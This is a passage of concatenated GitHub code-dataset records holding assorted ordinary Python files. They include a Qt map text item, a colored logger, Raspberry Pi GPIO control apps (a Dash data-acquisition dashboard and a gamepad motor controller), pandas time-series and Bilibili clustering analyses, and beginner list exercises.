self._doAlignment()\n self.updateItem()\n \n def fontChanged(self, font):\n self.textItem.setFont(self.text.font())\n self._doAlignment()\n self.updateItem()\n \n def offsetChanged(self, offset):\n self._doAlignment()\n self.updateItem()\n \n def alignmentChanged(self, alignment):\n self._doAlignment()\n self.updateItem()\n \n def penChanged(self, pen):\n self.textItem.setPen(self.text.pen())\n self._doAlignment()\n self.updateItem()\n \n def brushChanged(self, brush):\n if self.textItem:\n self.textItem.setBrush(self.text.brush())\n self._doAlignment()\n self.updateItem()\n \n def _doAlignment(self):\n align = self.text.alignment()\n trans = QTransform()\n self.textItem.setTransform(trans)\n \n rect = self.textItem.boundingRect()\n center = rect.center()\n \n if align & Qt.AlignVCenter:\n trans.translate(0, -1 * center.y())\n elif align & Qt.AlignTop:\n trans.translate(0, -1 * rect.top())\n elif align & Qt.AlignBottom:\n trans.translate(0, -1 * rect.bottom())\n \n if align & Qt.AlignHCenter:\n trans.translate(-1 * center.x(), 0)\n elif align & Qt.AlignLeft:\n trans.translate(-1 * rect.left(), 0)\n elif align & Qt.AlignRight:\n trans.translate(-1 * rect.right(), 0)\n \n offset = self.text.offset()\n trans.translate(offset.x(), offset.y())\n self.textItem.setTransform(trans)","repo_name":"mtils/ems","sub_path":"ems/qt4/location/maps/tiled/geotiledmaptextobjectinfo.py","file_name":"geotiledmaptextobjectinfo.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"} +{"seq_id":"13747513684","text":"import logging\n\n\nlogger = logging.getLogger(\"app\")\nch = None\n\nclass CustomFormatter(logging.Formatter):\n '''Logging Formatter to add colors and count warning / errors'''\n\n grey = '\\x1b[38;5m'\n yellow = '\\x1b[33;21m'\n red = '\\x1b[31;21m'\n bold_red = '\\x1b[31;1m'\n reset = '\\x1b[0m'\n format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s (%(filename)s:%(lineno)d)'\n\n FORMATS = {\n logging.DEBUG: grey + format + reset,\n logging.INFO: grey + format + reset,\n logging.WARNING: yellow + format + reset,\n logging.ERROR: red + format + reset,\n logging.CRITICAL: bold_red + format + reset\n }\n\n def format(self, record):\n log_fmt = self.FORMATS.get(record.levelno)\n _formatter = logging.Formatter(log_fmt)\n return _formatter.format(record)\n\n\ndef remove_logger():\n logger.removeHandler(ch)\n\n\ndef init_logger(mode=\"debug\") -> logging.Logger:\n logging_levels = {\n \"debug\": logging.DEBUG,\n \"info\": logging.INFO,\n \"warning\": logging.WARNING,\n \"error\": logging.ERROR,\n \"critical\": logging.critical\n }\n\n try:\n logger.setLevel(logging_levels[mode])\n\n except KeyError:\n logger.setLevel(logging_levels['debug'])\n print(\"logger mode not available, using debug mode\")\n \n def setup_logger(file_name, level):\n # file output\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s (%(filename)s:%(lineno)d)')\n fh = logging.FileHandler(file_name)\n fh.setLevel(level)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # create console handler with a higher log level\n global ch\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(CustomFormatter())\n\n logger.addHandler(ch)\n\n setup_logger('app.log', logging.DEBUG)\n setup_logger('app.warning.log', logging.WARNING)\n setup_logger('app.error.log', logging.ERROR)\n\n return logger\n\n\ndef clear_logs():\n logs = ['app.log', 'app.warning.log', 'app.error.log']\n for log in logs:\n with open(log, 'w'):\n pass\n","repo_name":"Seaofbbs/BlendArMocap","sub_path":"src/cgt_utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"} +{"seq_id":"17110247800","text":"#!/home/pi/MyDAQApp/daq/bin/python3\n\nimport Adafruit_ADS1x15\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport time\nimport dash_daq as daq\nfrom collections import deque\nimport plotly.graph_objs as go\nimport random\nimport plotly.graph_objects as go\nimport RPi.GPIO as GPIO\nfrom thermocouple import temp_data\nfrom Accelerometer import accelerometer_values\nfrom variables import *\nfrom components_layout import *\nfrom update_readings import *\n\npinList = [4,17,18,27,22,23,24,10]\n\nGPIO.setmode(GPIO.BCM)\n\nfor i in pinList:\n GPIO.setup(i, GPIO.OUT)\n GPIO.output(i, GPIO.LOW)\n\n@app.callback(dash.dependencies.Output('page-content', 'children'),\n [dash.dependencies.Input('url', 'pathname')])\ndef display_page(pathname):\n if pathname == '/page-1':\n return page_1_layout\n elif pathname == '/page-2':\n return page_2_layout\n elif pathname == '/page-3':\n return page_3_layout\n elif pathname == '/page-4':\n return page_4_layout\n elif pathname == '/page-5':\n return page_5_layout\n elif pathname == '/page-6':\n return page_6_layout\n elif pathname == '/page-7':\n return page_7_layout\n else:\n return index_page\n\n\n\n@app.callback(\n dash.dependencies.Output('graphop1','children'),\n [dash.dependencies.Input('dropdownlist1', 'value'), dash.dependencies.Input('graph-update', 'interval')]\n )\ndef update_graph(data_names, n):\n graphs = []\n list_value = []\n \n update_thermocouple_values(times, thermocouple_1, thermocouple_2, thermocouple_3, thermocouple_4, thermocouple_5, thermocouple_6, thermocouple_7, thermocouple_8)\n if len(data_names)>2:\n class_choice = 'col s12 m6 l4'\n elif len(data_names) == 2:\n class_choice = 'col s12 m6 l6'\n else:\n class_choice = 'col s12'\n\n\n for data_name in data_names:\n\n data = go.Scatter(\n x=list(times),\n y=list(data_thermocouple[data_name]),\n name='Scatter',\n fill=\"tozeroy\",\n fillcolor=\"#6897bb\"\n )\n\n graphs.append(html.Div(dcc.Graph(\n id=data_name,\n animate=True,\n figure={'data': [data],'layout' : go.Layout(xaxis=dict(range=[min(times),max(times)]),\n yaxis=dict(range=[min(data_thermocouple[data_name]),max(data_thermocouple[data_name])]),\n margin={'l':50,'r':1,'t':45,'b':70},\n title='{}'.format(data_name))}\n ), className=class_choice))\n\n return graphs\n\n\n@app.callback(\n dash.dependencies.Output('x-gauge','value'),\n [dash.dependencies.Input('stream', 'n_intervals')]\n )\ndef stream(conn):\n if conn:\n x, y, z = accelerometer_values()\n return x\n\n@app.callback(\n dash.dependencies.Output('y-gauge','value'),\n [dash.dependencies.Input('stream', 'n_intervals')]\n )\ndef stream(conn):\n if conn:\n x, y, z = accelerometer_values()\n return y\n\n@app.callback(\n dash.dependencies.Output('z-gauge','value'),\n [dash.dependencies.Input('stream', 'n_intervals')]\n )\ndef stream(conn):\n if conn:\n x, y, z = accelerometer_values()\n return z\n\n@app.callback(\n dash.dependencies.Output('led1','value'),\n [dash.dependencies.Input('updateled', 'n_intervals')]\n )\ndef update_led(conn):\n if conn:\n print(temp_data()[0])\n return (temp_data()[0])\n\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-1', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-1', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(4, GPIO.HIGH)\n else:\n GPIO.output(4, GPIO.LOW)\n \n \n return 'The switch is {}.'.format(on)\n\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-2', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-2', 'on')])\n\ndef update_output(on):\n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-3', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-3', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(17, GPIO.HIGH)\n else:\n GPIO.output(17, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-4', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-4', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(18, GPIO.HIGH)\n else:\n GPIO.output(18, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-5', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-5', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(27, GPIO.HIGH)\n else:\n GPIO.output(27, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-6', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-6', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(22, GPIO.HIGH)\n else:\n GPIO.output(22, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-7', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-7', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(23, GPIO.HIGH)\n else:\n GPIO.output(23, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n@app.callback(\n dash.dependencies.Output('toggle-switch-output-8', 'children'),\n [dash.dependencies.Input('my-daq-booleanswitch-8', 'on')])\n\ndef update_output(on):\n if(on):\n GPIO.output(24, GPIO.HIGH)\n else:\n GPIO.output(24, GPIO.LOW)\n \n return 'The switch is {}.'.format(on)\n\n \nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"kevinthakar/daq-dash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"19219823803","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport datetime\nfrom pandas.tseries.offsets import *\nfrom pandas.tseries.holiday import *\n\n# dti = pd.date_range('2014-08-29', '2014-09-05', freq='B')\n# print(dti.values)\n# print(dti.freq)\n\n# days = pd.date_range(\n# '2014-08-29', '2014-09-05', freq='B'\n# )\n# d = datetime.datetime(2014, 8, 29)\n# do = pd.DateOffset(days=1)\n# print(d + do)\n# print(d+BusinessDay())\n# print(d+2*BusinessDay())\n# print(d+BMonthEnd())\n#\n# print(BMonthEnd().rollforward(datetime.datetime(2014, 9, 15)))\n#\n# print(d - Week(weekday=1))\n\n# qends = pd.date_range(\n# '2014-01-01', '2014-12-31', freq='BQS-JUN'\n# )\n# print(qends.values)\n\n\n# aug = pd.Period('2014-08', freq='M')\n# print(aug)\n# print(aug.start_time, aug.end_time)\n# sep = aug+1\n# print(sep)\n\n# mp2013 = pd.period_range(\n# '1/1/2013',\n# '12/31/2013',\n# freq='M'\n# )\n# print(mp2013)\n\n# for p in mp2013:\n# print(\"{0} {1}\".format(p.start_time, p.end_time))\n\n\n# US FederalCalendar\n# cal = USFederalHolidayCalendar()\n# for d in cal.holidays(start='2014-01-01', end='2014-12-31'):\n# print(d)\n\n# Custom businessDay\n# cbd = CustomBusinessDay(holidays=cal.holidays())\n# print(datetime(2014, 8, 29) + cbd)\n\n\ncount = 24*60*60*5\nnp.random.seed(123456)\nvalues = np.random.randn(count)\nws = pd.Series(values)\nwalk = ws.cumsum()\nwalk.index = pd.date_range(\n '2014-08-01',\n periods=count,\n freq=\"S\"\n)\n# print(walk)\n# print(walk.resample(\"1Min\").mean())\n# print(walk['2014-08-01 00:00'].mean())\n# print(walk.resample(\"1Min\", closed='right').mean())\n\n# first_minute = walk['2014-08-01 00:00']\n# means = first_minute.rolling(\n# window=5,\n# center=False\n# ).mean()\n# means.plot()\n# plt.show()\n\nhlw = walk['2014-08-01 00:00']\nmeans2 = hlw.rolling(\n window=2, center=False\n).mean()\nmeans3 = hlw.rolling(\n window=5, center=False\n).mean()\nmeans4 = hlw.rolling(\n window=10, center=False\n).mean()\n\nhlw.plot()\nmeans2.plot()\nmeans3.plot()\nmeans4.plot()\nplt.show()\n","repo_name":"ejaj/pandas","sub_path":"time-series.py","file_name":"time-series.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"27538907122","text":"from .misc import *\r\n__all__ = [\r\n \"_tools\",\r\n \"_geometry\",\r\n \"_signal_processing\",\r\n \"_video_io\",\r\n \"__groups\",\r\n \"toString\",\r\n \"toArray\",\r\n \"toBytes\",\r\n \"toCharP\",\r\n \"createZeroArrayHandle\",\r\n \"loadDlls\",\r\n]\r\n\r\n\r\n# from ..geometry.rir_geometry import (\r\n# polygon_interpolate,\r\n# rdp_simplify_polygon,\r\n# rdp_simplify_polygon2,\r\n# draw_polygon,\r\n# extract_polygon,\r\n# extract_convex_hull,\r\n# minimum_area_bbox,\r\n# )\r\n\r\n# from ..tools.rir_tools import zstd_decompress, zstd_compress\r\n\r\n# __all__ = [\r\n# \"zstd_decompress\",\r\n# \"zstd_compress\",\r\n# \"polygon_interpolate\",\r\n# \"rdp_simplify_polygon\",\r\n# \"rdp_simplify_polygon2\",\r\n# \"draw_polygon\",\r\n# \"extract_polygon\",\r\n# \"extract_convex_hull\",\r\n# \"minimum_area_bbox\",\r\n# ]\r\n\r\n\r\n","repo_name":"IRFM/librir","sub_path":"src/python/librir/low_level/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"} +{"seq_id":"13358173927","text":"import pandas as pd\nfrom pyecharts import options as opts\nfrom pyecharts.charts import *\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom common import utils\n\n# %%\nfile_path = r'数据分析项目/database/bilibili2019-1_2020-3.csv'\ndf = pd.read_csv(file_path)\n\n# %%\nprint(utils.show_na(df))\nprint(utils.show_info(df))\nprint(utils.show_duplicated(df))\n\n# %%\n\"\"\"\nIFL模型\nI(Interaction_rate):\nI值反映的是平均每个视频的互动率,互动率越高,表明其视频更能产生用户的共鸣,使其有话题感。\n**I=(总弹幕数+总评论数)/总播放量/统计范围内视频数量\nF(Frequence):\nF值表示的是每个视频的平均发布周期,每个视频之间的发布周期越短,说明内容生产者创作视频的时间也就越短,创作时间太长,\n不是忠实粉丝的用户可能将其遗忘。\n**F=(统计范围内最晚发布视频时间-最早发布视频时间)/发布视频的数量\nL(Like_rate):\nL值表示的是统计时间内发布视频的平均点赞率,越大表示视频质量越稳定,用户对up主的认可度也就越高。\n**L=(点赞数X1+投币数X2+收藏数X3+分享数X4)/播放量X发布视频数\n\"\"\"\n\n# %%\ndf.drop_duplicates(inplace=True) # 去重\ndf.dropna(inplace=True) # 删除缺失值记录\ndf.reset_index(drop=True, inplace=True) # 重置index\ndf.sort_values('view', ascending=False, inplace=True) # 按播放量由高到低排序\ndf.reset_index(drop=True, inplace=True) # 重置index\ndf['date'] = pd.to_datetime(df['date'])\n# %%\n# B站播放量top10视频\nvideo_top10 = df.groupby(['title', 'bv'])['view'].sum().reset_index()\nvideo_top10.sort_values('view', ascending=False, inplace=True)\nvideo_top10 = video_top10.iloc[:10, :]\nvideo_top10.sort_values('view', ascending=True, inplace=True)\n# %%\nbar = (\n Bar()\n .add_xaxis(video_top10['title'].to_list())\n .add_yaxis('播放量', video_top10['view'].to_list())\n .set_global_opts(title_opts=opts.TitleOpts('B站播放前10视频'))\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .reversal_axis()\n)\nbar.render()\n\n# %%\n# B站硬笔数量top10 up主\ncoins_top10 = df.groupby(['author'])['coins'].sum().reset_index()\ncoins_top10.sort_values('coins', ascending=False, inplace=True)\ncoins_top10 = coins_top10.iloc[:10, :]\ncoins_top10.sort_values('coins', ascending=True, inplace=True)\nbar = (\n Bar()\n .add_xaxis(coins_top10['author'].to_list())\n .add_yaxis('硬币数', coins_top10['coins'].to_list())\n .set_global_opts(title_opts=opts.TitleOpts('B站硬币数量top10 up'))\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .reversal_axis()\n)\nbar.render()\n\n# %%\n# 四、构建特征值\n# I:\n# 视频数\nvideo_count = df.groupby('author')['bv'].count()\n# 过滤掉视频数不足5个的记录\ndata = df[~df['author'].isin(video_count[video_count.values < 5].index)].reset_index(drop=True)\n# 弹幕数\nbullet_screen_sum = data.groupby('author')['danmu'].sum()\n# 转发数\ncomments = data.groupby('author')['replay'].sum()\n# 观看数\nview = data.groupby('author')['view'].sum()\n# 视频数(<5个的)\nvideo_count = data.groupby('author')['bv'].count()\nI = round(((bullet_screen_sum + comments) / view / video_count * 100), 2).reset_index(name='I')\n\n# 4.2 构造F值\nlatest_date = data.groupby('author')['date'].max().dt.date\nearliest_date = data.groupby('author')['date'].min().dt.date\ndiff = (latest_date - earliest_date).dt.days\nF = (diff / video_count).reset_index(name='F')\n\n# 构造L值\n\ndata['L'] = (data['likes'] * 1 + data['coins'] * 2 + data['favorite'] * 3 + data['share'] * 4) / data['view']\nL = (data.groupby('author')['L'].sum() / video_count).reset_index(name='L')\n\n# 合并I,F,L指标\nIFL = pd.merge(I, F, how='outer', left_index=True, right_index=True)\nIFL = IFL.merge(L, how='outer', left_index=True, right_index=True)\nIFL.drop(columns=['author_x', 'author_y'], inplace=True)\nIFL = IFL.iloc[:, [2, 0, 1, 3]]\nIFL.set_index('author', inplace=True)\nmodel_scaler = MinMaxScaler()\ndate_scaler = model_scaler.fit_transform(IFL.iloc[:, 1:4])\n\n# 使用K-Means聚类方法\nscore_list = []\nsilhouette_init = -1\nfor n_cluster in range(2, 10):\n model_kmeans = KMeans(n_clusters=n_cluster) # 建立聚类模型对象\n label_temp = model_kmeans.fit_predict(date_scaler)\n silhouette_temp = silhouette_score(date_scaler, label_temp) # 得到每个k下的平均轮廓系数\n if silhouette_temp > silhouette_init: # 如果平均轮廓系数更高\n best_k = n_cluster # 保存最佳k值\n silhouette_init = silhouette_temp # 替换为下一轮的对照平均轮廓系数\n best_model = model_kmeans # 保存模型示例对象\n cluster_labels_k = label_temp # 保存聚类标签\n score_list.append([n_cluster, silhouette_temp]) # 将每次k值以及平均轮廓系数记录保存\n\nprint(score_list)\nprint('最优的k值是:{0}\\n对应的轮廓系数是{1}'.format(best_k, silhouette_init))\n\ncluster_labels = pd.DataFrame(cluster_labels_k, columns=['clusters'])\nIFL.reset_index(inplace=True)\nmerge_data = pd.concat((IFL, cluster_labels), axis=1)\n\n# %%\n# #计算各个聚类类别内部最显著的特征值\ncluster_features = []\nfor i in range(best_k):\n label_data = merge_data[merge_data['clusters'] == i].iloc[:, 1:4]\n desc_data = label_data.describe().round(3)\n mean_data = desc_data.iloc[1, :]\n mean_data.name = i\n cluster_features.append(mean_data)\n\ncluster_pd = pd.DataFrame(cluster_features)\ncluster_ct = pd.DataFrame(merge_data['clusters'].value_counts())\ncluster_ct.rename(columns={'clusters': 'count'}, inplace=True)\ncluster_ct['ratio'] = cluster_ct / sum(cluster_ct['count'])\nall_cluster_set = pd.concat((cluster_pd, cluster_ct), axis=1)\n\nc_schema = [\n {'name': 'I', 'max': 1, 'min': 0},\n {'name': 'F', 'max': 1, 'min': 0},\n {'name': 'L', 'max': 1, 'min': 0},\n]\n\n# radar = (\n# Radar()\n# .add_schema(schema=c_schema)\n# .add('0分组', [all_cluster.iloc[0, :].to_list()])\n# .add('1分组', [all_cluster.iloc[1, :].to_list()])\n# .add('2分组', [all_cluster.iloc[2, :].to_list()])\n# )\n# radar.render()\\\n\nall_cluster_set.iloc[:, :3].mean()\n","repo_name":"leepeiforx/PycharmProjects","sub_path":"数据分析项目/bilibili.py","file_name":"bilibili.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"15854329912","text":"#1) Meter los números del 1 al 20 en una lista y mostrarla en pantalla. Hacer lo mismo\n# para un rango de números indicado por un usuario. \nlista=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]\nmostrar=len(lista)\nfor rango in range(mostrar):\n print(lista[rango])\n\nnumero=int(input(\"ingresa cuantos numeros quieres que se impriman en pantala:\"))\nlista=[]\nfor rango in range(numero+1):\n lista.append(rango)\n print(lista[rango])\n\n#2) Pide un número y guarda en una lista su tabla de multiplicar hasta el 10. Por\n#ejemplo, si pide el 5 la lista tendrá: 5,10,15,20,25,30,35,40,45,50 \nnumero=int(input(\"Ingrese el numero que desea saber su tabla de multiplicar:\"))\nlista=[]\nlista.append(numero)\nguardado=0\nfor rango in range(1,10+1):\n guardado+=numero\n lista.append(guardado)\n print(lista[rango])\n#3) Pide una cadena (string) por teclado, mete los caracteres en una lista sin repetir\n#caracteres.\npalabra=input(\"Que palabra desea ingresar en la lista?:\")\ncontador=len(palabra)\nlista=[]\nfor rango in range(contador):\n lista.append(palabra[rango])\nprint(lista)\n#4) Pide una cadena (string) por teclado, mete los caracteres en una lista sin espacios. \npalabra=input(\"Que palabra desea ingresar en la lista?:\")\ncontador=len(palabra)\ncontador2=-1\nlista=[]\nfor rango in range(contador):\n lista.append(palabra[rango])\n contador2+=1\n if lista[contador2]==\" \":\n lista.remove(\" \")\n contador2-=1\nprint(lista)\n#5) Crea una tupla con números, pide un numero por teclado e indica cuantas veces se\n#repite.\nnumero=int(input(\"Que numero deseas saber cuantas veces se repite en la tupla?:\"))\ntupla=(1,2,4,32,31,4,2,12,43,2,6)\ncontador=len(tupla)\nveces=0\nfor rango in range(contador):\n if numero==tupla[rango]:\n veces+=1\nprint(f\"El numero {numero} en la tupla aparece {veces}\")\n#6) Crea una tupla con los meses del año, pedir números al usuario. Si el numero esta\n#entre 1 y la longitud máxima de la tupla, muestra el contenido de esa posición sino\n#muestra un mensaje de error. El programa termina cuando el usuario introduce un\n#cero\ntupla=(\"El programa termino\",\"enero\",\"febrero\",\"marzo\",\"abril\",\"mayo\",\"junio\",\"julio\",\"agosto\",\"septiembre\",\"octubre\",\"noviembre\",\"diciembre\")\ncontador=len(tupla)\nwhile True:\n numero=int(input(\"Ingrese un numero:\"))\n if numero > 0 and numero < contador:\n print(tupla[numero])\n elif numero == 0:\n print(tupla[numero])\n break\n elif numero < 0 or numero >= 13:\n print(\"El numero ingresado no es valido\")\n#7) Crea una tupla con números e indica el número con mayor valor y el que menor\n#tenga.\ntupla=(1,2,5,2,8,66,7,0)\ncontador=len(tupla)\nmayor=tupla[0]\nmenor=tupla[0]\nfor rango in range(contador):\n if mayor < tupla[rango]:\n mayor=tupla[rango]\n if menor > tupla[rango]:\n menor=tupla[rango]\nprint(f\"el mayor numero es {mayor}\")\nprint(f\"el menor numero es {menor}\")\n\n#9) Opcional: Pide números y mételos en una lista, cuando el usuario meta un 0 ya\n#dejaremos de insertar. Por último, muestra los números ordenados de menor a\n#mayor.\nlista=[]\nwhile True:\n numeros=int(input(\"Ingrese un numero:\"))\n lista.append(numeros)\n if numeros == 0:\n break\ncontador=len(lista)\nfor rango in range(contador):\n menor=lista[0]\n for rango2 in range(contador):\n if menor < lista[rango2]:\n menor=menor\n elif menor > lista[rango2]:\n menor=lista[rango2]\n rango2=0\n contador=contador-1\n print(menor)\n lista.remove(menor)\n\n","repo_name":"PabloCordob/Phyton","sub_path":"IITA_TP3.py","file_name":"IITA_TP3.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"33812430815","text":"import sys\nfiledata = open(sys.argv[1]).read().split()\ntext = filedata[0]\npattern = filedata[1]\n\ndef findpos(text,pattern):\n #find all positions of pattern in text\n \n pfind = text.find(pattern)\n pos = [pfind]\n ind=0\n while pfind >=0:\n subtext = text[pos[ind]+1:]\n pfind = subtext.find(pattern)\n pos.append(pfind+pos[ind]+1)\n ind=ind+1\n output = []\n for val in pos:\n output.append(val+1)\n \n return sorted(list(set(output)))\n\n\noutput = findpos(text,pattern) \nfh = open('findmotif_ANS.txt','w')\nfh.write(' '.join(map(str,output)))\nfh.close()\n\nimport webbrowser\nwebbrowser.open('motifANS.txt')\n","repo_name":"ao508/RosalindSolutions","sub_path":"patternmatch.py","file_name":"patternmatch.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"} +{"seq_id":"22532634202","text":"class CachedFunction:\n\n def __init__(self, function):\n self.function = function\n self.cache = {}\n\n def __call__(self, *args, **kwargs):\n if args in self.cache:\n return self.cache[args]\n result = self.function(*args, **kwargs)\n self.cache[args] = result\n return result\n\n\n\n\n\n\n\n@CachedFunction\ndef slow_fibonacci(n):\n if n == 1:\n return 0\n elif n in (2, 3):\n return 1\n return slow_fibonacci(n - 1) + slow_fibonacci(n - 2)\n\n\nprint(slow_fibonacci(100))\n\n","repo_name":"DAlavaro/stepik_oop","sub_path":"5.6 tasks/step_16_@CachedFunction.py","file_name":"step_16_@CachedFunction.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"7992530534","text":"from itertools import chain, combinations\nimport permutation as perm\n\nclass SYMMETRICGROUP(object):\n\n def __init__(self, order):\n self.order = order\n self.sn = self.getObject()\n\n def __repr__(self):\n return str(self.sn).replace(\"[\",\"{\").replace(\"]\",\"}\")\n \n def getObject(self):\n s = list(range(1, self.order+1))\n withSingletons = list(chain.from_iterable(combinations(s,r) for r in range(len(s)+1)))\n removeSingletons = list(filter(lambda k: len(list(k)) > 1, withSingletons))\n\n return [tuple([1])]+removeSingletons\n \n def generate(self):\n permutations = [tuple([i,j]) for j in range(1,self.order+1) for i in range(1, self.order+1)]\n withoutSingletons = list(filter(lambda p: p[0] != p[1], permutations))\n transitions = list(set(list(map(lambda p: tuple([min(p), max(p)]), withoutSingletons))))\n\n p = perm.PERMUTATION((2,3))\n q = perm.PERMUTATION((1,2))\n print(str(q)+str(p), \"=\", q.compose(p))\n\n return list(set(transitions+[perm.PERMUTATION(p).compose(perm.PERMUTATION(q)) for q in transitions for p in transitions]))\n","repo_name":"alecaines/RepresentationTheory","sub_path":"computation-m1/symmgroup.py","file_name":"symmgroup.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"37275805817","text":"from evdev import InputDevice, categorize, ecodes\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BOARD)\n\n#creates object 'gamepad' to store the data\n#you can call it whatever you like\ngamepad = InputDevice('/dev/input/event0')\n\n#button code variables (change to suit your device)\npin3=3 #boton1, motor1\npin5=5 #boton2, motor1\n\npin11=11 #boton3, motor2\npin13=13 #boton4, motor2\n\npin19=19 #botonR1,motor3\npin21=21 #botonR2,motor3\n\npin29=29 #botonL1,motor4\npin31=31 #botonL2,motor4\n\nen=23 #pwm motor2\nen2=16\nen3=18\n\nGPIO.setup(en,GPIO.OUT)\nGPIO.setup(en2,GPIO.OUT)\nGPIO.setup(en3,GPIO.OUT)\nGPIO.setup(pin5, GPIO.OUT)\nGPIO.setup(pin3, GPIO.OUT)\nGPIO.setup(pin11, GPIO.OUT)\nGPIO.setup(pin13, GPIO.OUT)\nGPIO.setup(pin19, GPIO.OUT)\nGPIO.setup(pin21, GPIO.OUT)\nGPIO.setup(pin29, GPIO.OUT)\nGPIO.setup(pin31, GPIO.OUT)\np=GPIO.PWM(en,1000)\np2=GPIO.PWM(en2,1000)\np3=GPIO.PWM(en3,1000)\n\n\n\nbtn1 = 288\nbtn2 = 289\nbtn3 = 290\nbtn4 = 291\nbtnR1 = 293\nbtnR2 = 295\nbtnL1 = 292\nbtnL2 = 294\np.start(100)\np2.start(100)\np3.start(100)\n\n#prints out device info at start\nprint(gamepad)\n\n#loop and filter by event code and print the mapped label\nfor event in gamepad.read_loop():\n if event.type == ecodes.EV_KEY:\n if event.value == 1:\n \n if event.code == btn1:\n print(\"Presionaste 1\")\n GPIO.output(pin3, GPIO.HIGH)\n \n elif event.code == btn2:\n GPIO.output(pin5, GPIO.HIGH)\n print(\"Presionaste 2\")\n \n elif event.code == btn3:\n print(\"Presionaste 3\")\n p.ChangeDutyCycle(100)\n GPIO.output(pin11, GPIO.HIGH)\n \n elif event.code == btn4:\n print(\"Presionaste 4\") \n p.ChangeDutyCycle(100)\n GPIO.output(pin13, GPIO.HIGH)\n \n \n elif event.code == btnR1:\n print(\"Presionaste R1\")\n GPIO.output(pin19, GPIO.HIGH)\n GPIO.output(pin29, GPIO.HIGH)\n \n elif event.code == btnR2:\n print(\"Presionaste R2\") \n GPIO.output(pin21, GPIO.HIGH)\n GPIO.output(pin31, GPIO.HIGH)\n \n elif event.code == btnL1:\n print(\"Presionaste L1\")\n p2.ChangeDutyCycle(99.85)\n p3.ChangeDutyCycle(100)\n GPIO.output(pin29, GPIO.HIGH)\n GPIO.output(pin21, GPIO.HIGH)\n \n elif event.code == btnL2:\n print(\"Presionaste L2\") \n p2.ChangeDutyCycle(99.93)\n p3.ChangeDutyCycle(100)\n GPIO.output(pin31, GPIO.HIGH)\n GPIO.output(pin19, GPIO.HIGH)\n \n if event.value == 0:\n \n if event.code == btn1:\n print(\"soltaste 1\")\n GPIO.output(pin3, GPIO.LOW)\n \n elif event.code == btn2:\n print(\"soltaste 2\") \n GPIO.output(pin5, GPIO.LOW)\n \n elif event.code == btn3:\n print(\"soltaste 3\")\n p.ChangeDutyCycle(20)\n GPIO.output(pin11, GPIO.LOW)\n GPIO.output(pin13, GPIO.HIGH)\n \n elif event.code == btn4:\n print(\"soltaste 4\")\n p.ChangeDutyCycle(20) \n GPIO.output(pin11, GPIO.LOW)\n GPIO.output(pin13, GPIO.HIGH)\n \n elif event.code == btnR1:\n print(\"soltaste R1\")\n GPIO.output(pin19, GPIO.LOW)\n GPIO.output(pin29, GPIO.LOW)\n \n elif event.code == btnR2:\n print(\"soltaste R2\") \n GPIO.output(pin21, GPIO.LOW)\n GPIO.output(pin31, GPIO.LOW)\n \n elif 